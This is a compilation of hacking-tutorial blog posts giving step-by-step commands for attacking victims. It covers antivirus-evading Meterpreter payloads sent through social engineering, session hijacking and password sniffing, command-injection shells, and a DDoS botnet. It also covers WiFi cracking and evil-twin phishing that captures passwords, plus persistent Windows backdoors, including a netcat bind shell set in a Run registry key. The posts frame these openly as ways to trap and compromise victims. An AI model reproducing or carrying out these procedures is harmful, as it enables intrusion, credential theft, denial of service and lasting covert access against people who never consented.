HERCULES is a special payload generator that can bypass all antivirus software.

First clone Hercules repository from github, to do so type:

https://github.com/EgeBalci/HERCULES.git

Now Open kali linux terminal in the directory that you have downloaded Hercules and type the following command

./HERCULES_x64 192.168.0.105 4444 –p windows/meterpreter/reverse_tcp –a 64 –l dynamic

Now it will save a file with name payload.exe now send your exe files to victim using any social engineering technique.

Now open kali Linux terminal and type netcat command this will attempt to initiate a TCP to the defined host on the port number specified. 

nc –l –p 4444

The post Bypass All Antivirus and Hack Remote Windows 10 PC using Hercules appeared first on Hacking Articles.

First download the CSploit from here and install in your android phone

Now open your cSploit and select your network and select the target IP which you want to hack.

Now select MITM option, see the picture below:

Session Hijacker

Now choose Session Hijacker option (it is used to capture victim’s browser activities)

Now click on start button to start the Session Hijacking

Now you will see the result. In my case victim has opened 3 tabs in his browser.

Now if you want to open any particular session then click on the link, it will automatically start the session hijacking. (Example is given below)

Password Sniffer

In this option choose the Password Sniffer tab.

Note: It will capture only http passwords

Here you can see the result.

Kill Connections

Now choose the Kill Connections option. It will disconnect the internet connection in the desired PC in network.

Redirect

Now choose Redirect option

Now you will see a prompt and enter the desired website address which you want to redirect the victim’s traffic. (This works only for http websites)

Replace images

In next option choose Replace images (It is used to change the image of the victim’s current tab)

Now choose your desired image which you want to display on victim’s browser.

Script Injection

Now choose Script Injection option (It will show the fake message of the victim’s browser)

Now choose Local File option

Now you will see a popup which prompts a default message ‘This site has been hacked with cSploit’

The post Hack your Network through Android Phone using cSploit appeared first on Hacking Articles.

Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos that can be used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.

First of all , install tamper data on firefox which is used for modifying  http requests.We will be using DVWA  for the testing purposes. DVWA is installed on the target machine with ip=192.168.0.105

Login into DVWA and set  the security to low and open the command injection tab

Now, open the tamper data and start tampering  and enter any IP address and submit . Now tamper data will pop up asking for tampering the data ,click on submit  to all the pop-ups.

Now open tamper data and find the cookie value from the GET request  and copy it.

Also copy the POST string from the POST method.

Now open up the terminal on kali Linux and type the following command

commix  –url=”http://192.168.0.105/dvwa/vulnerabilities/exec/#” –cookie=”security=low; PHPSESSID=nh5ehntedbu7ha97lpm8o8vjm2″ –data=”ip=192.168.0.105&Submit=Submit”

In URL field paste the  target URL.

In the cookie field paste the cookie value you copied and in data field paste the POST string you copied and put the IP of target machine in the ip field of post string .

After execution of the command you will get the os-shell of the targeted  machine and you can run any windows command as my target machine was windows.

Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him on LinkedIn .

The post Exploiting OS Command Injection in Web Application using Commix appeared first on Hacking Articles.

BrowserBackdoor is an Electron application that uses a JavaScript WebSocket Backdoor to connect to the listener.

BrowserBackdoorServer is a WebSocket server that listens for incoming WebSocket connections and creates a command-line interface for sending commands to the remote system.

The JavaScript backdoor in BrowserBackdoor can be used on all browsers that support WebSockets. 

 First clone BrowserBackdoorServer repository from github, to do so type:

https://github.com/IMcPwn/browser-backdoor.git

 Follow the below steps one by one:

cd client

npm install

Now go to the client folder and open index.html file in leafpad and edit the following line now type your kali Linux ip screenshot is given below.

After finishing the above task it will create the Browser backdoor script folder for windows and Linux users

Now type the following command step by step

npm install electron-packager -g

electron-packager . –all

Now go to the server folder in browser-backdoor directory and the following command

Bundle install

After that start browser backdoor by typing in terminal:

ruby bbsconsole.rb

Now send the Brwoserbackdoor-win32-x64 to the victim using any social engineering method when the victim clink on BrowserBackdoor file you can get the victim session example are given below.

Now type the session command to check the active session it will show you the session with id no.

Type the target command with session id to interact with current session sees the following example

Target 0

 Now if you want to more option type the help command you can get the list of all available command

The post Hack Remote PC using BrowserBackdoor – JavaScript WebSocket Backdoor appeared first on Hacking Articles.

Metasploit contains port-based modules as well as URI-based modules (web servers). This tool bridges Nmap XML file with Metasploit and generates a resource script containing matching Metasploit modules. that you can run against the target servers.

first clone Metasploithelper repository from github, to do so type:

git clone https://github.com/milo2012/metasploitHelper.git

Now open the terminal and scan the target with nmap and store the results in a xml file.

Here the target is 192.168.0.126 and the results are stored in 126.xml file.

nmap -sV -oX 126.xml 192.168.0.126

Now enter in the metsploithelper folder and open the metasploitHelper.py with leafpad

Now change the path in above file to the “/usr/share/metasploit-framework/modules/”

Now run metasploitHelper giving output of the nmap stored above as an input.

python metasploitHelper.py -i 126.xml

The above command will generate two rc scripts namely runAux.rc and runExp.rc.

runAux.rc contains the auxiliary modules and runExp.rc contains all the exploit modules .

Now give those scripts as input to the msfconsole .first we will give runAux.rc for using auxiliary modules by command.

msfconsole  -r  runAux.rc

Now ,if a auxiliary module is successful it will show us the result, like in my case it found the vnc login password of the target machine.

Now we will run thr runExp.rc script to run all the exploits found by the metasploitHelper.

 msfconsole -r runExp.rc

Now if there is a exploitable vulnerability in target machine it will exploit it and give the shell or meterpreter depending upon the exploit. like in my case ,it exploits the vsftpd vulnerability to get a reverse shell. Now we can run any command depending on the OS.

Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him on LinkedIn .

The post Automating Exploitation of Remote PC using Metasploithelper appeared first on Hacking Articles.

Remember: this tool is NOT for educational purpose.

Usage of UFONet for attacking targets without prior mutual consent is illegal.

It is the end user’s responsibility to obey all applicable local, state and federal laws

UFONet – is a free software tool designed to test DDoS attacks against a target using ‘Open Redirect’ vectors on third party web applications like botnet

Features

• Auto-update
• Clean code (only needs python-pycurl)
• Documentation with examples
• Web/GUI Interface
• Proxy to connect to ‘zombies’ (ex: tor)
• Change HTTP Headers (User-Agent, Referer, Host…)
• Configure requests (Timeout, Retries, Delay…)
• Search for ‘zombies’ on google results (using a pattern or a list of dorks)
• Test ‘Open Redirect’ vulnerabilities on ‘zombies’
• Download/Upload ‘zombies’ from Community
• Inspect a target (HTML objects sizes)
• Set a place to ‘bit’ on a target (ex: big file)
• Control number of rounds to attack
• Apply cache evasion techniques
• Supports GET/POST
• Multithreading
• Different search engines for dorking
• Web interface
• Geomapping / Visual data
• Order ‘zombies’ to attack you for benchmarking

First of all download UFONet from sourceforge by  this link:

https://sourceforge.net/projects/ufonet/

and extract it and enter the folder and open up the terminal and now list all the options available with this command ./ufonet  –help

Now we have to download all the zombies that will be used for attack.Open the terminal and type:

./ufonet  –download-zombies

Now type the following command for using the GUI version:

./ufonet  –gui

The above command will open a browser with GUI options .Click on START MOTHERSHIP.

Now it will open up a GUI with different options.

Now click on Botnet option.

Clicking on Botnet will give many options to configure.

Now clicking on List Zombies will list all the Zombies it will be using for the attack.

Now click on Attack option.

Set the target to your target URL or your target IP and set the number of rounds as per your need and click on start for the attack.

As you can see first round of attack is started from multiple zombies and after a time the host  will be down.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets

The post How to Create Botnet for D-Dos Attack with UFONet appeared first on Hacking Articles.

Airgeddon is a multi-use bash script for Linux systems to audit wireless networks.

Features

• Interface mode switcher (Monitor-Managed).
• DoS over wireless networks with different methods.
• Assisted Handshake file capture.
• Cleaning and optimizing Handshake captured files.
• Offline password decrypt on WPA/WPA2 captured files (dictionary and bruteforce).
• Compatibility with many Linux distros (see requirements section).
• Easy targeting and selection in every section.
• Controlled Exit. Cleaning tasks and temp files. Option to keep monitor mode if desired.
• Multilanguage support and autodetect OS language feature (see supported languages section).
• Help hints in every zone/menu for easy use.
• Auto-update. Script checks for newer version if possible.

First of all clone  airgeddon from git by executing the following command on the terminal:

git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git

Now to launch airgeddon enter the cloned folder and execute command:

./airgeddon.sh

After execution it will take some time to check if all the tools are installed  and then press Enter when asked.

Now it will ask you to select an interface .Select  wlan0  for wifi attacks as in my case I have selected 2.

After selecting wlan0 it will give many other options to choose .You have to select option 2 to enter into the monitor mode which puts the wlan0 interface in monitor mode to listen to all the available wifi connections  and then press ENTER key to continue further.

Now  again it will give some new options and you have to select option 5 to enter Handshake tools menu.

Now it will present you with more options  , now select option 5 to start capturing handshake and press ENTER when asked .Then it will again ask you to press ENTER for selecting the target so press ENTER. 

Now it will open a new window showing you the list of available targets  .Wait till your target wifi appears and then  hit ctrl^c.

Now it will show you the available target list, so select your target by entering the id  NO. given in the N column.  I have selected the network Tenda_3  by entering  6.After that press ENTER to continue.

Now it will ask to choose the attack type so select  2 for Deauth  aireplay attack which will first use deauth attack to disconnect all the client and then capture the handshake between the router and the client .Again  press ENTER to continue which will open two windows. 

As you can see below  two windows will open ,one is deauth attack window and otrher is capturing handshake .You have to wait till the WPA Handshake appears on the top right side of the window and then hit ctrl^c.

Then it will ask if you get the handshake ,so press y for YES and then it will ask the path of the capture file which is default set to the last capture so just press ENTER .

 Now you have to return to the main menu by pressing  7

Now you have to crack the password by selecting the 6 option.

Now it will ask to select a attack for breaking the password ,we will select dictionary attack to use a dictionary  and then it will  ask if you want to use already selected  BSSID so press  y and then it will ask to use the already selected BSSID so press y and it will again ask the path of dictionary file .Here you can give your custom made dictionary or default dictionary present in the kali .I have used password.lst in the  /usr/share/nmap/nselib/data/passwords.lst and then press ENTER key to continue.

Now it will start cracking with aircrack-ng and if the password is present in the dictionary it will show you the password  as you can see that KEY FOUND[87654321].

The post Hack Wireless Network using Airgeddon appeared first on Hacking Articles.

Fluxion is a remake of linset by vk439 with less bugs and more features. It’s compatible with the latest release of Kali (Rolling).

How it works

• Scan the networks.
• Capture a handshake (can’t be used without a valid handshake, it’s necessary to verify the password)
• Use WEB Interface *
• Launch a Fake AP instance to imitate the original access point
• Spawns a MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the Fake AP and enter the WPA password.
• A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script
• A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password
• Each submitted password is verified by the handshake captured earlier
• The attack will automatically terminate, as soon as a correct password is submitted.

First  of all clone Fluxion from github with command :

git clone https://github.com/deltaxflux/fluxion.git

And execute the script from its folder with command:

./fluxion

After starting it will ask for choosing the interface so select wlan0 by ENTERING 1 and then it will ask you to select the channel to listen to wifi connections so enter 1 to listen to all wifi connections.

It will open a new window for wifi monitoring so wait till your target appears and hit ctrl^c.

Now it will show the list of available targets so select the target by pressing the id no. of that connection as in my case i have selected ttpl by press 2.

Now select option 1 for creating fake AP (access point) and press ENTER.

Now press ENTER to skip and then select 1 for choosing aircrack-ng from handshake checking options.

Now select option 1 to Deauthenticate all clients connected to the target wifi

After selecting 1 it will open 2 windows, one for capturing WPA handshake and other for deauthenticate all clients. Now enter 1 on the MENU window to check handshake without closing the other windows.

After checking handshake it will ask for choosing the Web Interface, so select 1 and press ENTER.

Now it will ask for choosing the language, so select 1 for ENGLISH and press ENTER.

Now it will open 4 windows starting the fake AP and deauthenticating the clients of the wifi network.

Now the fake AP is started and the clients will not be able to connect to the original wifi and will be forced to connect to our fake AP and when the client will open a browser it will be redirected to a login page asking for the WPA password

When the user will enter the correct WPA password all the attacks will be stopped and the password will be shown as in my case KEY FOUND [rajchandel12345].(ATTACKS WILL ONLY  STOP WHEN THE CLIENT WILL ENTER CORRECT PASSSWORD)

The post Hack Wi-Fi using Social Engineering with Fluxion (Evil Twin Attack) appeared first on Hacking Articles.

Fern Wifi Cracker is a Wireless security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks.

Fern comes preinstalled in the kali linux , so go to Applications and then to Wireless attack and then click on fern wifi cracker.

Now click on select interface and select the wireless interface which will put it into monitor mode to listen to all the wifi AP’s nearby. Now click on Scan for Access points.

After scanning it will show the WEP and WPA secured wifi separately but in my case there is no WEP so it is showing  5 WPA secured wifi  so click on WPA tab. 

Now it will show all the WPA wifi and select your target by clicking on it as in my case I have selected ttpl as my target and now select dictionary by clicking on BROWSE on lower right hand corner.  

Now select your dictionary from your system .I has selected nmap.lst from /usr/share/wordlists/ directory and then click on open. (YOU CAN USE YOUR CUSTOM MADE WORDLIST OR ANY OTHER)

Now select Regular attack and then click on WIFI ATTACK on top right hand corner.

Now it will prompt with WPA ATTACK REQUIREMENT as at least 1 client is required to be connected to the target AP, so click OK on it.

Clicking on OK will start the attack by first deauthenticating the client and then capturing handshake and then breaking the encryption which will lead to successful breaking of the password if it is present in your dictionary. In my case it has successfully found my password as WPA KEY:rajchandel12345

Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him on LinkedIn .

The post Cracking WiFi Password using Fern WIFi Cracker appeared first on Hacking Articles.

HosTaGe is a mobile honeypot that detects attacks on wireless networks.

First of all search for HosTaGe honeypot on android play store.

Now click on the above shown app and install it.

Now for testing i will start nmap version scan of the android from my system with command :

Nmap –sV 192.168.0.107

Here 192.168.0.107 is my target ip.

As  you can see various fake services are started as shown in nmap results.

As the nmap  scanning is started the android icon will turn red and an alarm will be started.

Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him on LinkedIn .

The post Detect Hacker in Network using Android Phone appeared first on Hacking Articles.

IPFire, a free linux based open source firewall distribution, version < 2.19 Update Core 101 contains remote command execution vulnerability in the proxy.cgi page.

 Exploit Targets

Ipfire 2.19

Requirement

Attacker: kali Linux

Victim PC: linux

Open Kali terminal type msfconsole

Now type use exploit/linux/http/ipfire_proxy_exec

msf exploit (ipfire_proxy_exec)>set rhost 192.168.0.169 (IP of Remote Host)

msf exploit (ipfire_proxy_exec)>set rport 444

msf exploit (ipfire_proxy_exec)>set password admin

msf exploit (ipfire_proxy_exec)>exploit

The post Exploitation in Linux Firewall using IPFire proxy.cgi RCE appeared first on Hacking Articles.

First take the meterpreter shell from any known exploit and bypass UAC for better results .Then   run command:

Persistence

run persistence –X –i 10 –p 443 –r 192.168.0.105

-X=connect back when the system boots

-i 10=try to connect back every 10 seconds

-p 443=reverse connection port

-r ip=reverse connection ip

After successfully executing the script, reboot the system and then use exploit:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lport 443

set lhost 192.168.0.105

exploit

s4u_persistence

Creates a scheduled task that will run using service-for-user (S4U). This allows the scheduled task to run even as an unprivileged user that is not logged into the device. This will result in lower security context, allowing access to local resources only. The module requires ‘Logon as a batch job’ permissions (SeBatchLogonRight)

Now type use exploit/windows/local/s4u_persistence

msf exploit (s4u_persistence)>set payload windows/meterpreter/reverse_tcp

msf exploit (s4u_persistence)>set lhost 192.168.0.137 (IP address of kali Linux)

msf exploit (s4u_persistence)>set lport 443

msf exploit (s4u_persistence)>set trigger logon

msf exploit (s4u_persistence)>set session 2

msf exploit (s4u_persistence)>exploit

Now after successful backdoor creation, restart the victim pc you can see the previous meterpreter session is closed and then run command:

 use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.137

exploit

VSS_PERSISTENCE

This module will attempt to create a persistent payload in a new volume shadow copy. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY option, the user should need password in order to start session on the target machine.

First take the meterpreter shell and bypass UAC by any known technique and then background the session .Then run series of commands:

Now type use exploit/windows/local/vss_persistence

msf exploit (vss_persistence)>set runkey true

msf exploit (vss_persistence)>set schtask true

msf exploit (vss_persistence)>set rhost 192.168.222.137

msf exploit vss_persistence)>set session 2

msf exploit (vss_persistence)>exploit 

Now run exploit which will create a backdoor and will give a meterpreter session.

Now background it and use the multi handler and also set the payload with commands:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.222.135

set lport 4444

exploit

Now restart the victim system and the meterpreter session will die, and then run: exploit after restarting the system it will give a reverse meterpreter shell.

REGISTRY PERSISTENCE

This module will install a payload that is executed during boot. It will be executed either at user logon or system startup via the registry value in “CurrentVersion\Run” (depending on privilege and selected method). The payload will be installed completely in registry

First background the meterpreter session and then run commands:

Now type use exploit/windows/local/registry_persistence

msf exploit (registry_persistence)>set payload windows/meterpreter/reverse_tcp

msf exploit (registry_persistence)>set lhost 192.168.222.135 (IP address of kali Linux)

msf exploit (registry_persistence)>set lport 4545

msf exploit (registry_persistence)>set startup system

msf exploit (registry_persistence)>set session 1

msf exploit (registry_persistence)>exploit

 Now set up your system for reverse connection. Run the following commands on your msfconsole:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.222.135

set lport 4545

exploit

 Now restart the victim pc and your previous meterpreter session will die, so now run the exploit: After restarting you will get the reverse meterpreter shell as you can see in my case

NETCAT

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.

After getting the meterpreter shell and bypassing UAC run the following command:

upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32

Now set the registry value with the following command:

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d ‘C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe’

Now get the command shell with command:

Shell and then bypass the firewall on the victim system by adding firewall rules with shell command:

netsh advfirewall firewall add rule name=’netcat’ dir=in action=allow protocol=Tcp localport=4445

Now check whether the rules are added successfully with the command:

netsh firewall show portopening

As you can see the the firewall rule netcat is added successfully.

Now after restarting of the victim system , run the following command on the terminal:

nc  -nv 192.168.0.101 4445

Here 192.168.0.101 is the victim system you previously created backdoor and 4445 is the port you gave while setting the registry value.

After successful running the command you will get the command shell.

The post 5 ways to Create Permanent Backdoor in Remote PC appeared first on Hacking Articles.

GERIX WIFI CRACKER is a GUI wireless 802.11 penetration tools which uses the aircrack-ng method behind its point and click method to crack the wifi password.

First of all clone the github repo with command:

git clone https://github.com/J4r3tt/gerix-wifi-cracker-2.git

Now inside the installed directory give the gerix.py file permission to execute with command:

chmod +x gerix.py

and then start the gerix wifi cracker with command:

python gerix.py

Now a GUI window will appear, click on Reload the Wireless Interfaces and when the wireless interface appears click on it i.e. wlan0 in my case and then click on Enable/Disable Monitor Mode to enable the monitor mode from managed mode.

After enabling the monitor mode the wireless interface name will be changed to wlan0mon and the mode will be monitor .Now for scanning the wireless networks select the monitor mode interface (wlan0mon in my case) and then click on Rescan networks.

After scanning networks select you target by clicking on it as in my case i have selected tp link and then go to WPA tab (As the target AP is using WPA2 security).

After clicking on WPA tab, go to general functionalities and start sniffing and logging by clicking on it and a terminal window will appear capturing the packets of the target AP.

Now without closing the terminal windows got to WPA attack section and click on Autoload victim clients who will load victim client MAC address to deauthenticate and now click on Client Deauthentication to disconnect the victim so that we can capture the handshake.

Now as you can see WPA handshake is successfully captured and same can be seen in the top right corner of the terminal window. Now close the terminal window.

Now we have to crack the password from the captured file so got to Cracking tab and then to WPA bruteforce cracking section and give the dictionary path in the Add your dictionary field and then click on Aircrack-ng  -Crack WPA password .(you can also choose any other method for cracking like pyrite and rainbow tables)

As you can see it has successfully cracked the password.

Author: Himanshu Gupta is an InfoSec Researcher | Technical writer. You can follow him on LinkedIn .

The post Wifi Penetration Testing using Gerix Wifi Cracker appeared first on Hacking Articles.

WiFi-Pumpkin framework for Rogue Wi-Fi Access Point Attack It helps a hacker to create a free open fake wifi and as soon as victim connects to the fake open wifi, he gets trapped. However, the best feature is that if your internet connection is working, victim will get access to internet. Hence, more chances of him to get trapped(Nice, isn’t it?).

First, to install Wifi-Pumpkin we type on terminal:

git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git

Once the cloning is done, we need to install. Hence, go to the installed directory of WiFi-Pumpkin and open it in terminal and type the following command to install it:

./installer.sh –install

Now, open the installed directory of wifi-pumpkin in terminal and type:

Python wifi-pumpkin.py

It will load wifi pumpkin in GUI as you can see in the screenshot below.

Now, all you have to do is configure your settings and click on ‘Start Access Point’.

Wait for some devices to connect. They will be displayed as you can see below. A good thing is that devices are automatically assigned a class A IP address.

In the victim’s phone PumpAP is created and he/she is accessing the internet without even knowing that they have fallen into the sweet trap of free internet!

While the victim is acessing Wi-Fi like usual, we can see his/her activity. As you can see in the below screenshot that we are able to capture victim’s phone’s “Hike Contacts.”

As soon as victim opens anyone’s profile on hike, their number is being captured by us!

Many other notable features include cookie capturing. As n the below screenshot, we can see victim’s device’s cookies being visible. Which is great to know as it may have something interesting?

We are also able to capture any credentials/ login id and password on any http website.

As you can see below that victim has logged in into way2sms.com and their ID and password are being recorded.

For even better case scenarios, when many of victims will be connected to your fake Wireless Network thinking they are in luck, we will be recording everything in clear text. If we are unable to see everything on terminal, don’t worry, WiFi-Pumpkin has stored everything category wise.

Now, we go to the directory:

/WiFi-Pumpkin/logs/AccessPoint

In that directory many log files are present that have captured numerous items. One such text file is “credentials.log”

Here, we will see all the login details

Another notable file is the “urls.log”

We can see all the accessed urls on victim’s device, along with their IP address.

So, this is how you allure victims into free internet and steal data without even letting them know!

The post Hack Password using Rogue Wi-Fi Access Point Attack (WiFi-Pumpkin) appeared first on Hacking Articles.

OpenSSH (also known as OpenBSD Secure Shell) is a suite of security-related network-level utilities based on the Secure Shell (SSH) protocol, which help to secure network communications via the encryption of network traffic over multiple authentication methods and by providing secure tunneling capabilities.

OpenSSH was designed to evade various attacks like MITM , eavesdropping by encrypting all the traffic but an attack known as User-Enumeration Time Based Attack was discovered which helps in effectively increasing the brute force attack efficiency by guessing the usernames firsthand as in a Brute Force attack two fields are required Username and Password and we will be able to guess the Username correctly thus decreasing the time required for Brute Force Attack as of now only Password field is to be Brute Forced.

Osueta a simple Python script was developed to exploit the OpenSSH User Enumeration Timing Attack.(found in 5.* and 6.* versions of the *nix systems)

HOW THIS WORKS??

When we want to connect to a SSH server we have to provide a Username and a Password so first it is checked if the Username exists or not then:

1.) If the Username doesn’t exist the password is not compared to original one.

2.) If the Username exist the password is compared to original one by comparing the hash of the given password , if it is correct you are granted access .

3.) Now suppose a username exists and we are using a very long password suppose of length 40000 bytes which is the default length used by osueta  (like 40000 S) so the hash of the given password has to be generated to compare it with the original one as a result the system slows down and the time measurement is increased which is the key as it tells us that username exists.

First clone the github repo with the terminal command:

git clone https://github.com/c0r3dump3d/osueta.git

Now change your directory to osueta and run the following command:

python osueta.py –H 192.168.222.136 –U pp –p 22

-H (Openssh server host i.e. victim IP –192.168.222.136 in my case)

-U (any guessed username which can be present on the victim machine – pp in my case)

-p (port no. of the running ssh service – 22 in our case )

Firstly it checks if the given port  is open or not and then service banner is detected to know the version of the running ssh server.

Now it generates 10 random usernames to try against the target server to test the time measurement of the server i.e. test the delay time of the server . After that it test the server with provided username and if there is delay in user authentication then the user exist as in my case the user pp exists on the target server.

We can also pass a list of users as the input to check against all the usernames in the list with command:

./osueta.py –H 192.168.222.136 –L users.txt –p 22

-L (users input file –users.txt in my case)

As in my case it has successfully enumerated the following username from the given list

pp

root

him

We can also create a DOS(Denial Of Service) like situation on the target server with the command:

./osueta.py –H 192.168.222.1376 –p 22 –U pp –v no –dos yes

–dos (if you want to create a DOS situation -yes)

Now firstly it will detect if the given user exists if yes then it generates a lot of connections to the target server and when the number of sessions is reached the target server starts to reject the rest of the connections causing a DOS.

As you can see the target server is denying any connection when i try to connect with it.

Author: Himanshu Gupta is an InfoSec Researcher | Technical writer. You can follow him on LinkedIn .

The post OpenSSH User Enumeration Time-Based Attack with Osueta appeared first on Hacking Articles.

Linset is a tool for Evil twin attack

How it works

• Scan the networks.
• Select network.
• Capture handshake (can be used without handshake)
• We choose one of several web interfaces tailored for me (thanks to the collaboration of the users)
• Mounts one FakeAP imitating the original
• A DHCP server is created on FakeAP
• It creates a DNS server to redirect all requests to the Host
• The web server with the selected interface is launched
• The mechanism is launched to check the validity of the passwords that will be introduced
• It deauthentificate all users of the network, hoping to connect to FakeAP and enter the password.
• The attack will stop after the correct password checking

 First of all download Linset from github with command:

git clone https://github.com/vk496/linset.git

and then change the permissions of the linset script with command:

chmod +x linset

and then execute it with command:

./linset

After execution it will ask to choose the interface so select wlan0 for wireless extension which will put it into monitor mode.

Then it will ask to select the channel so enter 1 to select all the channels.

Now the monitor mode will listen to all the available wifi connections , so wait till your target appears and then press ctrl^c.

Now it will list  all the AP’s with their SSID ,id no. and signal strength , so enter the id of your target and hit Enter as in my case i have selected rajlab by entering 1.

Now select Hostapd by entering 1 which will help in creating Fake AP.

Now hit Enter for using default path to save the capture file or you can give the custom path to save the capture  file which will ask to select the method for cracking the handshake so select 1 for aircrack-ng.

Now select 1 to de-authenticate all the clients connected to the target AP to capture the handshake.

Now when the handshake is captured you will see it on right top corner of the new window and then enter 1 on the menu window as we have captured the handshake. 

Now select 1 for web interface which will be presented to the victim when he will connect to our fake AP.

Now it will ask for language selection of the web interface so enter 1 for English.

Now 4 terminal windows will be opened of which one will create the Fake AP , one will be regularly de-authenticating all the clients and one will  show all the info of the AP.

Now as you can see there are 2 rajlab AP are present of which one is fake and open and the other is the original but the clients will not be able to connect to the original one due to our deauth attack so they will be forced to connect to our fake AP.

After connecting to the Fake AP it will redirect the victim browser to below given web-page which will require the victim to enter the  original AP password as the attack will only stop when the victim will enter correct password.

After submitting the correct password , the attack will be stopped and a message will be generated that your connection will be restored .

As you can see in my case victim entered the correct password and we found the correct key as:

KEY FOUND! [ raj123987 ]

Author: Himanshu Gupta is an InfoSec Researcher | Technical writer. You can follow him on LinkedIn .

The post Hack Wifi using Evil Twin Method with Linset in kali Linux appeared first on Hacking Articles.

This module simplifies the Regsvr32.exe Application Whitelisting Bypass technique. The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and PowerShell download and execute) can occur on the same port.

Exploit Targets

Windows 7/8/8.1/10

Requirement

Attacker: kali Linux

Victim PC: Windows 10

Open Kali terminal type msfconsole

Now type use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit (regsvr32_applocker_bypass_server)>set payload windows/meterpreter/reverse_tcp

msf exploit (regsvr32_applocker_bypass_server)>set lhost 192.168.0.124 (IP of Local Host)

msf exploit (regsvr32_applocker_bypass_server)>set srvhost 192.168.0.124

msf exploit (regsvr32_applocker_bypass_server)>set srvport 8080

msf exploit (regsvr32_applocker_bypass_server)>exploit

Now, we have to copy the regsvr32 code generated in victim’s run bar on PC using social engineering method.

As soon as we do that, we will get access of victim’s PC.

Now type sessions –i  to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.

The post Hack Remote Windows PC using Regsvr32.exe (.sct) Application Whitelisting Bypass Server appeared first on Hacking Articles.

Tiki-Wiki CMS’s calendar module contains a remote code execution vulnerability within the viewmode GET parameter. The calendar module is NOT enabled by default. If enabled, the default permissions are set to NOT allow anonymous users to access. Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14 Verified/Tested against 14.1

 Exploit Targets

tiki-wiki 14.1

Requirement

Attacker: kali Linux

Victim PC: Linux,Windows

Open Kali terminal type msfconsole

Now type use exploit/linux/http/tiki_calendar-exec

msf exploit (tiki_calendar_exec)>set targeturi /tiki

msf exploit (tiki_calendar_exec)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (tiki_calendar_exec)>set username admin

msf exploit (tiki_calendar_exec)>set password raj123

msf exploit (tiki_calendar_exec)>set rport 81

msf exploit (tiki_calendar_exec)>exploit          

The post Exploit Remote Server using Tiki-Wiki CMS Calendar Command Execution appeared first on Hacking Articles.

Smplshllctrlr is a PHP Command Injection exploitation tool so for demo we will be using DVWA (Damn Vulnerable Web App).

1.) Exploit web page and upload simple-shell.php (or simply find an existing exploitable command injection).

2.) Execute the controller to exploit the command injection vulnerability. The controller is simply a command injection exploitation tool, and can therefore with a few adjustments be rewritten to exploit already existing vulnerabilities without the need for uploading the ‘simple-shell.php’.

Here we will be exploiting the File Uploading vulnerability in DVWA by uploading a custom shell and executing it.

First clone the github repo with command:

git clone https://github.com/z0noxz/smplshllctrlr.git

And now give the script permission to execute by entering in the cloned folder and executing command:

chmod +x simple-shell-controller.py

Now open up DVWA in your browser and open up the upload vulnerability tab from where we will upload our reverse shell named simple-shell.php to gain a reverse shell.

Now click on Browse button and select the simple-shell.php present in the cloned folder of smplshllctrl  

Now click on upload to upload the shell to server.

After uploading the shell it will tell us the path of the uploaded shell as ../../hackable/uploads/simple-shell.php.

Now run the following command:

python simple-shell-controller.py  –url “http://192.168.222.1/dvwa/hackable/uploads/simple-shell.php” 

As you can see it has successfully returned a command shell.

Here –url is the url of uploaded shell in the previous step.

Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him on LinkedIn .

The post Hack Web Server using PHP Command Injection (Smplshllctrlr) appeared first on Hacking Articles.

Veil-Evasion is a powerful tool to generate payload executables that bypass common antivirus solutions.

To install veil-evasion on your kali linux, type :

apt-get install veil-evasion

 After the installation completes, run veil-evasion with the following command on terminal, in the installed directory of veil-evasion:

veil-evasion

To see the options of payloads type list

We can see a menu of the available payloads to use. There are plenty of payloads to use.

We will be using the payload id-24. We type the command:

use powershell/meterpreter/rev_tcp

After that set local host(Your PC’s IP). In my case it is 192.168.0.122. Hence:

set lhost  192.168.0.122

set lport 4444

And then generate the payload:

generate

Enter the name of file. Let the name of file to be generated be demo. Therefore;

 >demo

Now, the Veil-Evasion tool has created a bat file in powershell code in the directory:

/var/lib/veil-evasion/output/source/demo.bat

Now, open a new terminal and open veil-evasion again( using command ‘veil-evasion’) and then type:

use auxiliary/macro_converter

macro_converter converts the bat file into a readable txt file. Under this, type the following commands to generate a txt file:

set POSH_BATCH /var/lib/veil-evasion/output/source/demo.bat

generate

This generates a txt file in /var/lib/veil-evasion/output directory.

Copy the code written in the generated txt file.

Now open windows->New Microsoft  Office Excel Worksheet->view(on the top bar)->macro

Enter the macro name->create

Then in the Macro editing area(or the workbook) copy paste the code present in “demo1.txt” to the workbook and save macro.

